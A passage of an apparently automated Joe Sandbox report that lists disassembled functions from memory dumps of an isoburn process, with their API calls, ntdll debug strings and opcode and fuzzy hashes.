                                                                          Uniqueness Score: -1.00%

                                                                          Function 02ED73F7 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNELBASE(00008003,?,?,02ED1A2A,02ED21A9,02EE3557,00000000), ref: 02ED7433
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorMode
                                                                          • String ID:
                                                                          • API String ID: 2340568224-0
                                                                          • Opcode ID: 26a8537f8ec240dea86e513593c943ab9d97c757713fe3b37d291765e484f7b7
                                                                          • Instruction ID: 7df6b34911e6524ef79aeaa62082447c1bed2f3422fd28677ef669cba56e920b
                                                                          • Opcode Fuzzy Hash: 26a8537f8ec240dea86e513593c943ab9d97c757713fe3b37d291765e484f7b7
                                                                          • Instruction Fuzzy Hash: D2E02631AC02002EE7809BF88C06FAA228CAB503A8F14C629F81CEA2D1F621B4054620
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02ED7400 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNELBASE(00008003,?,?,02ED1A2A,02ED21A9,02EE3557,00000000), ref: 02ED7433
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorMode
                                                                          • String ID:
                                                                          • API String ID: 2340568224-0
                                                                          • Opcode ID: d2a2b4edda2da953367c3c24d5c5aebed2b3062394d9fb6d9458327b5a9b220c
                                                                          • Instruction ID: d6d09e66d290b953fc10019e1e05c03f9d026b8817a22ff40c32a3f5a7d80722
                                                                          • Opcode Fuzzy Hash: d2a2b4edda2da953367c3c24d5c5aebed2b3062394d9fb6d9458327b5a9b220c
                                                                          • Instruction Fuzzy Hash: 66D05E726C42053BEA40EBF4CC46F96328DAB007A8F14C068F94CEB2C2E965F01146A5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05442C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: ca0563430f23b9a25561630e5c92a86df93ee497b99b94e9674891ff1c0d56bb
                                                                          • Instruction ID: 9c6de92281865022a6369c576eb4825e5ed4732fa3ab51e47d3c5fe21bf75cf8
                                                                          • Opcode Fuzzy Hash: ca0563430f23b9a25561630e5c92a86df93ee497b99b94e9674891ff1c0d56bb
                                                                          • Instruction Fuzzy Hash: 4AB09B729455C5C5EA11E7604608B67791177D0711F65C063F3030651F4778C5D1E975
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Non-executed Functions

                                                                          Function 02ECE2BF Relevance: .0, Instructions: 14COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a0ebee8b487f9b084570e16a6c39ca6229a609df2ac72fc373ae30b58edfc77c
                                                                          • Instruction ID: a7eda380ecf1ce68d0ec0abfd53f4c729532db83709ef95b5d1ebd720ed15e82
                                                                          • Opcode Fuzzy Hash: a0ebee8b487f9b084570e16a6c39ca6229a609df2ac72fc373ae30b58edfc77c
                                                                          • Instruction Fuzzy Hash: 51B0922BE5608812CA208C5E78422F4FB64D3C7631E4472FBEC4CA7202A187D66A55D9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05442890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                          • API String ID: 48624451-2108815105
                                                                          • Opcode ID: cfaa61fbf28aea7ef87436766c4d8a3c2a217464b95975d426da4edbb087dbef
                                                                          • Instruction ID: 2ad660871afd21e71bd98791e7826ca91a59d0bbdb7edc8e0027df1864eab5d2
                                                                          • Opcode Fuzzy Hash: cfaa61fbf28aea7ef87436766c4d8a3c2a217464b95975d426da4edbb087dbef
                                                                          • Instruction Fuzzy Hash: 2751DBBAB48116BFDB10DF59C8909FFF7B9BB08200B54826BF459D7641D274DE508BA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 054B2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                          • API String ID: 48624451-2108815105
                                                                          • Opcode ID: 107b00ebb96ce7e082bea14758166932f62fc309d7eefef00c91ee7e6178e815
                                                                          • Instruction ID: d5687e88d2b69631b8b6240fe568d4026bc313008e5c08b0650b2c2187587f0d
                                                                          • Opcode Fuzzy Hash: 107b00ebb96ce7e082bea14758166932f62fc309d7eefef00c91ee7e6178e815
                                                                          • Instruction Fuzzy Hash: 6D512679A08645AFEB30DE5CC9809FFB7FAEB44200B00885BE4DAD7641D6F4DA009771
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05437630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 05474742
                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 05474725
                                                                          • Execute=1, xrefs: 05474713
                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 05474655
                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 054746FC
                                                                          • ExecuteOptions, xrefs: 054746A0
                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 05474787
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                          • API String ID: 0-484625025
                                                                          • Opcode ID: 764a950f8af94901a41d680358983032930e48c79c61cf0f190f2653b18b66fc
                                                                          • Instruction ID: f9e7e8aa5d1dcb2f3d2e76043f2e4681212a8070b5b6909c7f8f5148103abdc0
                                                                          • Opcode Fuzzy Hash: 764a950f8af94901a41d680358983032930e48c79c61cf0f190f2653b18b66fc
                                                                          • Instruction Fuzzy Hash: 3A51E8B17402197ADF15EAA59C9AFFA77A9EB08310F0400EFE505A7290DB71AB45CF50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0544B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: __aulldvrm
                                                                          • String ID: +$-$0$0
                                                                          • API String ID: 1302938615-699404926
                                                                          • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                          • Instruction ID: dd81cf3eed79b7c8fecb4dd81f4cfac163b85cef410177689707ca02ecaeada4
                                                                          • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                          • Instruction Fuzzy Hash: B4817F70A892499AFF24CF68C891BFFBBA2FF45320F18459BD891A7391C634D8418F55
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 054B20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: %%%u$[$]:%u
                                                                          • API String ID: 48624451-2819853543
                                                                          • Opcode ID: c16d07700f485489c171e41758ad70172d06894e3b2a479735000af647286fee
                                                                          • Instruction ID: 4466971e5008706407e34360d3f0d6e6156b54d5f50ba8832bd8694d68b2f320
                                                                          • Opcode Fuzzy Hash: c16d07700f485489c171e41758ad70172d06894e3b2a479735000af647286fee
                                                                          • Instruction Fuzzy Hash: B221627AA04119ABEB10DF79DC44AFFBBF9EF54650F04015BE905E3200EBB0D9068BA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0542F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 054702BD
                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 054702E7
                                                                          • RTL: Re-Waiting, xrefs: 0547031E
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                          • API String ID: 0-2474120054
                                                                          • Opcode ID: 871064d08313f64dc0a7ca94ab0c566c89964bf54843fea17cd16ce3dbbc8819
                                                                          • Instruction ID: 842b5d965af2b4ba4893f4a8321d464afd93f084c6e4203c3441433160873a7d
                                                                          • Opcode Fuzzy Hash: 871064d08313f64dc0a7ca94ab0c566c89964bf54843fea17cd16ce3dbbc8819
                                                                          • Instruction Fuzzy Hash: EEE1AD30608751AFD724CF28C889BAAB7F1FB84714F944A9EF59587390D774E849CB42
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0543BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 05477B7F
                                                                          • RTL: Re-Waiting, xrefs: 05477BAC
                                                                          • RTL: Resource at %p, xrefs: 05477B8E
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                          • API String ID: 0-871070163
                                                                          • Opcode ID: 3182f528112c72a19875e7238d62b76da8d86ca16d4123987774e38b1afd7f74
                                                                          • Instruction ID: 9dfa3175d0e5506f506e4f8ea5b4339e0f8591ed48cd5ac5f46308d2fac0d373
                                                                          • Opcode Fuzzy Hash: 3182f528112c72a19875e7238d62b76da8d86ca16d4123987774e38b1afd7f74
                                                                          • Instruction Fuzzy Hash: 9C41E0317047069BD724DE29C842FEBB7E6FB88720F000A5EE95ADB790DB31E4058B91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0543B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0547728C
                                                                          Strings
                                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 05477294
                                                                          • RTL: Re-Waiting, xrefs: 054772C1
                                                                          • RTL: Resource at %p, xrefs: 054772A3
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                          • API String ID: 885266447-605551621
                                                                          • Opcode ID: 6413199a7e2b2fc89d36e1cb367ea1010c8d760c9bd8c5471098e64ddd5d5337
                                                                          • Instruction ID: ef5d6cc1d5a467b8dbe1ba466966a7971567c668fb1ff1a01b47df3334ce27d7
                                                                          • Opcode Fuzzy Hash: 6413199a7e2b2fc89d36e1cb367ea1010c8d760c9bd8c5471098e64ddd5d5337
                                                                          • Instruction Fuzzy Hash: 6E41F031704206ABC725DE25CC42FEAB7A6FB98710F10061AF965EB380DB31E806DBD1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 054B2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: %%%u$]:%u
                                                                          • API String ID: 48624451-3050659472
                                                                          • Opcode ID: 2a1ae293021fe9111b35b337a5cfd1ff63936959e97735ed2e536c62e3932167
                                                                          • Instruction ID: fae0fd3eb3a60cf20bf7f311b573b4ee629dbabe848fa56a1e9b39f9e15d6392
                                                                          • Opcode Fuzzy Hash: 2a1ae293021fe9111b35b337a5cfd1ff63936959e97735ed2e536c62e3932167
                                                                          • Instruction Fuzzy Hash: FE318476A042199FDB60DF39DC44BEF77B8FB44610F44059AE849E3200EB709A458BB0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05447D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: __aulldvrm
                                                                          • String ID: +$-
                                                                          • API String ID: 1302938615-2137968064
                                                                          • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                          • Instruction ID: f8dc60de48a50a10a4492ffa07110232d45f3bda99bb9bd443033dde9a8a1234
                                                                          • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                          • Instruction Fuzzy Hash: 73918F70E842169AFB24DE69C881AFFB7A6FF44320F64865BE855A73C4D73099438F50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05409126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $$@
                                                                          • API String ID: 0-1194432280
                                                                          • Opcode ID: 0d1835057257c448acbf3cc9f87a41a65b55f31cc98c4c8b652ccf685e7f0dbd
                                                                          • Instruction ID: 753adab64924b8cb0b1c8135a7a2db1be4c3eadc0f9608ccac3c519c07292505
                                                                          • Opcode Fuzzy Hash: 0d1835057257c448acbf3cc9f87a41a65b55f31cc98c4c8b652ccf685e7f0dbd
                                                                          • Instruction Fuzzy Hash: D4812A75E052699BDB35CF54CC44BEAB7B4AB08710F1441EBE90AB7280D7709E85CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0548CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 0548CFBD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: CallFilterFunc@8
                                                                          • String ID: @$@4rw@4rw
                                                                          • API String ID: 4062629308-2979693914
                                                                          • Opcode ID: 0f855b7d6275299fff6f5417d3fb59edf62381577f9255e0a68f462fc4e84ef0
                                                                          • Instruction ID: f24f411caa863dbd049a329df22b985e7fd3606ed12e2b68fbb9c84f8b8a61bf
                                                                          • Opcode Fuzzy Hash: 0f855b7d6275299fff6f5417d3fb59edf62381577f9255e0a68f462fc4e84ef0
                                                                          • Instruction Fuzzy Hash: 1E418D71E00214DFDB21AFAAC844AEEBBB8FF46704F10442BE915EB294D7749901DB65
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%